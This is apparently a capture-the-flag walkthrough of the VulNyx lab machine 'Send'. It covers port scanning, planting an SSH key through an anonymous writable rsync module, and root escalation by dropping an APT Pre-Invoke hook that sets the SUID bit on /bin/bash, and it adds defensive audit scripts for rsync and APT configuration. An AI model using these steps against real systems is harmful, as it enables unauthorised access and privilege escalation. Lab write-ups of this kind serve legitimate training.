Information

Send is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.


Enumeration

Nmap

TCP

 nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.157
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 12:23 CEST
Nmap scan report for 192.168.1.157
Host is up (0.000087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
873/tcp open  rsync
 nmap -sVC -p22,80,873 192.168.1.157
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 12:24 CEST
Nmap scan report for 192.168.1.157
Host is up (0.00042s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp  open  http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Site doesn't have a title (text/html).
873/tcp open  rsync   (protocol version 31)

Shell (wally)

80/TCP (HTTP)

Site

Directory Brute Force

 gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.157/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.157/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 278]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================

873/TCP (RSYNC)

Modules

List

I find a module called share, and its description says it is the home directory of the user wally

 rsync 192.168.1.157::

share          	wally (home)

Access

Inside share, the directory structure confirms that it is the home directory of the user wally

 rsync 192.168.1.157::share

drwx------          4.096 2024/07/11 17:34:21 .
lrwxrwxrwx              9 2023/04/23 09:34:26 .bash_history
-rw-------            220 2023/01/15 13:58:06 .bash_logout
-rw-------          3.526 2023/01/15 13:58:06 .bashrc
-rw-------            807 2023/01/15 13:58:06 .profile
-r--------             33 2024/07/11 17:34:21 user.txt
drwxr-xr-x          4.096 2023/04/29 15:50:29 .local

Keys

Create Keys

I create an SSH key pair with ssh-keygen

 ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase for "/root/.ssh/id_rsa" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:HB4FnU2OAHIjYoV1sY9EomD+dx20DOwrVIIgztBJyYs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|+*=*B O+o+.+.    |
|Bo*+ O =+o+o.    |
| =..  * o+. .    |
|E o  o *.o.      |
|   .....S.       |
|    ....         |
|      .          |
|                 |
|                 |
+----[SHA256]-----+

Upload Key

I upload an authorized public key (authorized_keys) to the .ssh folder to try to gain access

 mv id_rsa.pub authorized_keys
 rsync authorized_keys 192.168.1.157::share/.ssh/

I confirm that the public key (authorized_keys) was uploaded successfully and log in to the system as the user wally

 rsync -r 192.168.1.157::share

drwx------          4.096 2025/07/18 12:36:55 .
lrwxrwxrwx              9 2023/04/23 09:34:26 .bash_history
-rw-------            220 2023/01/15 13:58:06 .bash_logout
-rw-------          3.526 2023/01/15 13:58:06 .bashrc
-rw-------            807 2023/01/15 13:58:06 .profile
-r--------             33 2024/07/11 17:34:21 user.txt
drwxr-xr-x          4.096 2023/04/29 15:50:29 .local
drwx------          4.096 2023/04/29 15:50:29 .local/share
drwx------          4.096 2023/04/29 15:50:29 .local/share/nano
drwxr-xr-x          4.096 2025/07/18 12:37:17 .ssh
-rw-r--r--            563 2025/07/18 12:37:17 .ssh/authorized_keys

 chmod 600 id_rsa
 ssh -i id_rsa wally@192.168.1.157
wally@send:~$ id ; hostname
uid=1000(wally) gid=1000(wally) grupos=1000(wally)
send
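
The access above works because the share module accepts anonymous writes into a home directory. The following audit of an rsyncd.conf is an added example, not part of the original write-up: the sample configuration is constructed (only the module name and comment come from the listing above; the path and the second module are assumptions), and the parser is a simplification that ignores "hosts allow" and include files.

```shell
#!/bin/sh
# Added example: flag rsync daemon modules that allow anonymous access.
# Reads rsyncd.conf from the files given as arguments, or from stdin.
audit_rsyncd_conf() {
    awk '
    function report(   ro, au) {
        if (mod == "") return
        ro = (mro != "") ? mro : gro   # module setting overrides global
        au = (mau != "") ? mau : gau
        if (au != "") return           # "auth users" set: not anonymous
        # rsyncd defaults to "read only = yes" when the option is absent
        if (ro ~ /^(no|false|0)$/) printf "ANON-WRITE [%s] path=%s\n", mod, path
        else                       printf "ANON-READ [%s] path=%s\n", mod, path
    }
    /^[ \t]*(#|$)/ { next }            # comments and blank lines
    /^[ \t]*\[/ {                      # start of a new [module]
        report()
        mod = $0; gsub(/^[ \t]*\[|\][ \t]*$/, "", mod)
        mro = mau = path = ""
        next
    }
    {
        i = index($0, "="); if (!i) next
        # whitespace and case in parameter names are not significant
        k = tolower(substr($0, 1, i - 1)); gsub(/[ \t]/, "", k)
        v = substr($0, i + 1); gsub(/^[ \t]+|[ \t]+$/, "", v)
        if (k == "path") path = v
        if (k == "readonly")  { if (mod == "") gro = tolower(v); else mro = tolower(v) }
        if (k == "authusers") { if (mod == "") gau = v; else mau = v }
    }
    END { report() }
    ' "$@"
}

# Constructed sample: [share] mirrors the listing above, [backup] is hardened.
sample_rsyncd_conf() {
    cat <<'EOF'
# constructed sample, path values are assumptions
[share]
    comment = wally (home)
    path = /home/wally
    read only = no
[backup]
    path = /srv/backup
    auth users = backup
    secrets file = /etc/rsyncd.secrets
EOF
}

sample_rsyncd_conf | audit_rsyncd_conf
```

Any ANON-WRITE module whose path is or contains a home directory lets an unauthenticated client place .ssh/authorized_keys there; setting "read only = yes" or "auth users" with a secrets file on the module closes that path.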

Privilege Escalation

Enumeration

Cron

Using pspy, I detect that every minute the root user (UID=0) updates the system with apt-get update

2025/07/18 12:46:01 CMD: UID=0     PID=9376   | /usr/sbin/CRON -f 
2025/07/18 12:46:01 CMD: UID=0     PID=9377   | /bin/sh -c /usr/bin/apt-get update 
2025/07/18 12:46:01 CMD: UID=0     PID=9378   | /usr/bin/apt-get update 

APT

The user has write permission on the /etc/apt/apt.conf.d/ directory

wally@send:~$ ls -la /etc/apt/
total 40
drwxr-xr-x  8 root root 4096 ene 15  2023 .
drwxr-xr-x 72 root root 4096 jul 18 12:23 ..
drwxrwxrwx  2 root root 4096 jul 11  2024 apt.conf.d
drwxr-xr-x  2 root root 4096 jun 10  2021 auth.conf.d
-rw-r--r--  1 root root  150 ene 15  2023 listchanges.conf
drwxr-xr-x  2 root root 4096 mar 28  2021 listchanges.conf.d
drwxr-xr-x  2 root root 4096 jun 10  2021 preferences.d
-rw-r--r--  1 root root 1011 ene 15  2023 sources.list
-rw-r--r--  1 root root    0 ene 15  2023 sources.list~
drwxr-xr-x  2 root root 4096 jun 10  2021 sources.list.d
drwxr-xr-x  2 root root 4096 jul 11  2024 trusted.gpg.d

Abuse

I create a malicious APT configuration file so that, when the task starts and updates the system, it runs the command defined in it

(I use GTFOBins to obtain the shell-escape sequence)

wally@send:~$ cd /etc/apt/apt.conf.d/
wally@send:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"chmod 4755 /bin/bash"};' > suid

Once the task has run, I see that /bin/bash now has 4755 (SUID) permissions and I become the root user

wally@send:~$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(wally) gid=1000(wally) euid=0(root) grupos=1000(wally)
send
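
The escalation above depends on two things: apt.conf.d being writable by non-root users, and APT running hook directives as whoever invokes it (root, from cron). The following check and fix is an added example, not part of the original write-up; the function names are hypothetical, and HOOK lines need manual review because stock packages also ship legitimate hooks.

```shell
#!/bin/sh
# Added example: audit an APT configuration directory for the two
# conditions abused above. Prints one finding per line.
audit_apt_conf() {
    dir=${1:-/etc/apt/apt.conf.d}
    # 1. The directory, or a file in it, is writable by group or others:
    #    any such user can add configuration that root's apt will load.
    find "$dir" \( -type d -o -type f \) \( -perm -0002 -o -perm -0020 \) \
        -exec printf 'WRITABLE %s\n' {} \; 2>/dev/null
    # 2. Hook directives execute shell commands when apt or dpkg runs.
    #    Option names are matched case-insensitively, as in the file above.
    grep -rinE '(Pre|Post)-Invoke|Pre-Install-Pkgs' "$dir" 2>/dev/null |
        sed 's/^/HOOK /'
}

# Remove group/other write access from the directory and its files.
# Does not delete hook files: review each HOOK finding before removing it.
fix_apt_conf_perms() {
    dir=${1:-/etc/apt/apt.conf.d}
    find "$dir" \( -type d -o -type f \) -exec chmod go-w {} +
}

# Stand-alone run against the real directory, when it exists.
if [ -d /etc/apt/apt.conf.d ]; then
    audit_apt_conf /etc/apt/apt.conf.d
fi
```

On the machine from this write-up the audit would report the directory as WRITABLE and the suid file as a HOOK; after fixing permissions, the dropped file and the SUID bit on /bin/bash still have to be removed separately.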

Flags

Now, as the root user, I can read the user.txt and root.txt flags

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
78fc****************************
9e1d****************************

That concludes the walkthrough of the Send machine.

Happy Hacking!